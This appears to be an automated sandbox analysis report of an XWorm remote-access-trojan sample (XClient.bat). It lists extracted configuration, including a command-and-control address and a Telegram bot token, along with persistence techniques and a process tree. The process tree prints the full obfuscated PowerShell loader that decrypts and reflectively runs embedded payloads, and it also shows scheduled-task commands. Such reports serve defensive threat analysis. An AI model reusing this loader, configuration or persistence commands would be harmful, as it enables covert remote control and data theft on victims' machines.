xworm | b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408

Analysis

max time kernel
149s
max time network
150s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
22-05-2024 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient.bat
Size

64KB
MD5

b9ba38c08e5f9113c31434ae324b3a67
SHA1

c5a03303b400dcac370989ba8e51e0b0a3c0622d
SHA256

b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
SHA512

a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
SSDEEP

768:AO70rJOxpoeQhjCEqvimrMRLdJmmC5UXfs3NadfzteQCv/vFyVzgZpB+20JaaaTg:3CgSGNIfso7tqvFysTTdpePNKaAURYja

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

83.143.112.35:7000

Mutex

CyKBTjaY0aAqNzKT

Attributes

Install_directory
%Temp%
install_file
Chrome.exe
telegram
https://api.telegram.org/bot6671364658:AAFSR01MD7rod9u5ExKsea5-2_kUtJR70Ks

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3024-162-0x0000028DF2910000-0x0000028DF2920000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

28 3024 powershell.exe
104 3024 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3552 powershell.exe

flow	pid	process
28	3024	powershell.exe
104	3024	powershell.exe

pid	process
3552	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk	powershell.exe

Executes dropped EXE 2 IoCs

Processes:

Chrome.exeChrome.exe

pid process

5660 Chrome.exe
5232 Chrome.exe

pid	process
5660	Chrome.exe
5232	Chrome.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Chrome.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4472 schtasks.exe

pid	process
4472	schtasks.exe

Modifies registry class 2 IoCs

Processes:

powershell.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Chrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	Chrome.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Chrome.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
1384	powershell.exe
1384	powershell.exe
1384	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

powershell.exe

pid process

3024 powershell.exe

pid	process
3024	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe
Token: 36	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe
Token: 36	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid process

2044 firefox.exe
2044 firefox.exe
2044 firefox.exe
2044 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

2044 firefox.exe
2044 firefox.exe
2044 firefox.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

firefox.exepowershell.exe

pid	process
2044	firefox.exe
3024	powershell.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe
2044	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exefirefox.exefirefox.exe

description	pid	process	target process
PID 2216 wrote to memory of 2792	2216	cmd.exe	net.exe
PID 2216 wrote to memory of 2792	2216	cmd.exe	net.exe
PID 2792 wrote to memory of 2972	2792	net.exe	net1.exe
PID 2792 wrote to memory of 2972	2792	net.exe	net1.exe
PID 2216 wrote to memory of 2976	2216	cmd.exe	cmd.exe
PID 2216 wrote to memory of 2976	2216	cmd.exe	cmd.exe
PID 2216 wrote to memory of 1384	2216	cmd.exe	powershell.exe
PID 2216 wrote to memory of 1384	2216	cmd.exe	powershell.exe
PID 1384 wrote to memory of 3552	1384	powershell.exe	powershell.exe
PID 1384 wrote to memory of 3552	1384	powershell.exe	powershell.exe
PID 1384 wrote to memory of 1192	1384	powershell.exe	WScript.exe
PID 1384 wrote to memory of 1192	1384	powershell.exe	WScript.exe
PID 1192 wrote to memory of 4376	1192	WScript.exe	cmd.exe
PID 1192 wrote to memory of 4376	1192	WScript.exe	cmd.exe
PID 4376 wrote to memory of 4664	4376	cmd.exe	net.exe
PID 4376 wrote to memory of 4664	4376	cmd.exe	net.exe
PID 4664 wrote to memory of 3500	4664	net.exe	net1.exe
PID 4664 wrote to memory of 3500	4664	net.exe	net1.exe
PID 4376 wrote to memory of 388	4376	cmd.exe	cmd.exe
PID 4376 wrote to memory of 388	4376	cmd.exe	cmd.exe
PID 4376 wrote to memory of 3024	4376	cmd.exe	powershell.exe
PID 4376 wrote to memory of 3024	4376	cmd.exe	powershell.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 4236 wrote to memory of 2044	4236	firefox.exe	firefox.exe
PID 2044 wrote to memory of 4488	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 4488	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe
PID 2044 wrote to memory of 1372	2044	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_209_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_209.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_209.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_209.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4376

C:\Windows\system32\net.exe
net file
5⤵
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
6⤵
PID:3500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Roaming\Windows_Log_209.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
5⤵
PID:388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3024

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome.exe"
6⤵
- Creates scheduled task(s)
PID:4472

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2044

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2044.0.1825806360\358924027" -parentBuildID 20221007134813 -prefsHandle 1684 -prefMapHandle 1676 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {132d4369-0fa3-4b8c-a768-6c784dda5e52} 2044 "\\.\pipe\gecko-crash-server-pipe.2044" 1764 1ffbcfd7558 gpu
3⤵
PID:4488

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2044.1.97669396\977410655" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2cfdb7f-8d20-468c-9221-bf0bb9da7df6} 2044 "\\.\pipe\gecko-crash-server-pipe.2044" 2120 1ffb1d72b58 socket
3⤵
PID:1372

C:\Program Files\Mozilla Firefox\firefox.exe
